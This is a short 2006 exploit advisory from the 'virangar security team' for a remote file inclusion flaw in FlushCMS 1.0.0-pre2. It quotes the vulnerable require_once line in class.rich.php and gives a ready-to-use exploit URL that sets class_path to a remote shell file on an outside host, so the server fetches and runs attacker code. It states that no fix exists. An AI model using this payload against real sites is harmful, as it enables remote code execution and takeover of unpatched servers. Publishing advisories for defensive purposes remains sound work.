FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability

2006-07-16 00:00:00

flushcms (tpath) Remote File Inclusion Vulnerability

virangar security team
www.virangar.org
www.virangar.net
Discoverd By : igi
contact : [email protected]
for all member virangar

bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------

simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?

#

Fixes

No fixes

In order to submit a new fix you need to be registered.